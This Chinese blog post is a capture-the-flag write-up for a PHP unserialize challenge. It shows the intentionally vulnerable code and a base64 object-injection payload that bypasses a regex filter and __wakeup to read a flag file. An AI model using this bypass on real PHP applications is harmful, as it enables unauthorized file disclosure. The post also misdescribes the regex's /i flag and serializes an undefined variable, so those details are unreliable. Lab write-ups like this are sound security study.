攻防世界:web——Web_php_unserialize

最新推荐文章于 2022-04-11 11:09:44 发布
最新推荐文章于 2022-04-11 11:09:44 发布
阅读量162 收藏
点赞数
文章标签: php java 正则表达式 laravel web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793770
版权

靶场内容:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

很显然,解题的关键点有两个:

  • function __wakeup() :这个方法的存在阻止我们将序列化文件传入
  • preg_match('/[oc]:\d+:/i', $var):这个过滤器的存在阻止我们的序列化参数

/[oc]:\d+:/i是一个正则表达:

  • [oc] 匹配所有的o和c两个字符
  • \d 匹配所有整数
  • /i 匹配所有的字母

也就是说,我们如果输入任意的序列化参数,都会被搞掉
题目告诉了我们flag文件是fl4g.php

我们可以生成序列化:

$a = new Demo('fl4g.php');
echo serialize($b);

序列化是这样的 O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
我们可以稍作修改,比如:
O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
再用base64编码,传递var参数,就可以直接得到flag了

Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
php中magic_quotes_gpc对unserialize的影响分析
10-25
主要介绍了php中magic_quotes_gpc对unserialize的影响,以实例的形式分析了magic_quotes_gpc安全过滤对unserialize造成的影响以及对此的解决方法,非常具有实用价值,需要的朋友可以参考下
ctf php沙箱,详谈CTF中常出现的PHP反序列化漏洞
weixin_39968724的博客
03-16 991
0x01什么是PHP序列化与反序列化PHP序列化是一种把变量或对象以字符串形式转化以方便储存和传输的方法在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。比方来说,我现在有一个类,我需要通过接口进行数据传输,或存储至数据库中以备将来使用,同时又想保持其结构,让接收方接收或数据库读数据时恢复其原来的结构,就需要通过序列化将对象按照一定格式转化为字符串的形式来进行传输简单...
PHP序列化与反序列化记录
LYJ20010728的博客
12-04 543
(1): preg_match(’/[oc]:\d+:/i’, $value, $matches); 在include/utils.php类有sugar_unserialize方法 function sugar_unserialize($value) { preg_match('/[oc]:\d+:/i', $value, $matches); if (count($matches)) { return false; } return unserializ
php反序列化漏洞 freebuf,反序列化漏洞(PHP
weixin_29110051的博客
03-09 257
介绍序列化和反序列化序列化和反序列化:大型网站中类创建的对象多的时候会占用大量空间,序列化就是将这些对象转换为字符串来保存,当用到的时候再转换为对象,由字符串重新转换为对象的时候用到的就是反序列化。例:...
攻防世界 | unserialize
weixin_47982238的博客
10-15 249
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
WEB安全-PHP反序列化漏洞原理
qq_59350385的博客
04-11 1734
一、漏洞原理 在提及漏洞前,首先要先理解PHP中的serialize()和unserialize()两个函数(由于没有PHP开发基础,请各位大哥指出小弟本文中的错误),serizlize()就是将变量、对象、数组等数据类型转换成字符串方便进行网络传输和存储,再通过unserialize()将字符串进行转换成原来的数据。当存在反序列化函数及可利用魔术方法时,且unserialize()接受到的字符串对于用户是可控时,用户可针对使用的magic function(魔术方法)来构造特定的语句,从而达到控制整个反
phpserialize::bookmark_tabs:PHP serialize()和unserialize()for Go
05-05
安装更新go get -u github.com/elliotchance/phpserialize phpserialize需要Go 1.8+。例子package mainimport ("fmt""github.com/elliotchance/phpserialize")func main () {out , err := phpserialize . Marshal ( ...
PHP7 新特性:unserialize、 IntlChar、CSPRNG.md
最新发布
06-13
PHP 中,`unserialize()` 函数用于将已存储的序列化字符串转换回 PHP 的值。然而,`unserialize()` 函数存在安全风险,因为它可能允许执行恶意代码或产生意外的行为,尤其是当反序列化的数据来自不可信的源时。 ...
php_igbinary-1.1.1到2.0.8版本大全
12-29
PHP_igbinary是一款高效的数据序列化扩展,专为PHP设计,用于替代默认的PHP序列化方式(如serializeunserialize)。它的主要目的是提高在数据库存储、缓存系统以及跨进程通信中的性能,尤其是在大型和高负载的Web...
php_igbinary-php5.5版本
07-25
标题中的"php_igbinary-php5.5版本"和描述中的"php_igbinary.dll-php5.5版本"提到了两个关键概念:`igbinary`和`PHP 5.5`。`igbinary`是一个PHP扩展,而`PHP 5.5`是PHP的一个特定版本。我们将深入探讨这两个主题。 ...
攻防世界-Web-Exercise-Wirteup
08-08 392
攻防世界Web题进阶区题目部分记录。前面题型比较基础,仅记录较为典型的题目用于以后知识点的回顾。 目录 Web_php_unserialize Web_php_unserialize 题目描述: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function _
攻防世界web进阶_Web_php_unserialize
chy082的博客
08-21 686
攻防世界web进阶_Web_php_unserialize 解题思路 打开之后是一段代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//构造函数 把里面的参数变成传进来的参数 } function __destruct() { echo @highlight_file($this->file, true); } func
PHP反序列化漏洞总结
热门推荐
坚持硬核
10-07 1万+
一、什么是序列化? 将php中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中。而反序列化就是将这个过程倒过来。 当在php中创建了一个对象后,可以通过serialize()把这个对象变成一个字符串,保存对象的值方便以后传递使用。 <?php class A{ public $test = 123; } $a = new A; $a_ser=ser...
php函数
weixin_43995930的博客
10-09 310
php函数希望能够帮助到你serialize() -- 对象序列化功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 希望...
攻防世界 web部分的Web_php_unserialize的writeup
dchua123的专栏
04-01 1411
这个题就是三个点: 1、$file改成fl4g.php; 2、绕过:preg_match('/[oc]:\d+:/i', $var) 3、跳过__wakeup()。 步骤如下: <?php class Demo { private $file = 'fl4g.php'; } $a= serialize(new demo); $a=str_replace('O:4',...
php反序列化姿势学习
彼岸花苏陌的博客
01-16 2287
php反序列化姿势学习1.__wakeup()函数绕过2./[oc]:\d+:/i研究欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1.__wakeup()函数绕过 wakeup函数作为ph
安恒12月赛Web题解
0verWatch的博客
12-22 2869
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
2018安恒杯12月月赛复现
Gard3nia的博客
03-02 929
前言 萌新因为种种原因没有做安恒12月的月赛题,正巧这几天发现复现,又学到了新知识! 正文 Web easy 题目index.php给出源码: &lt;?php @error_reporting(1); include 'flag.php'; class baby { public $file; function __toString() { ...
攻防世界web_php_unserialize
06-28
攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值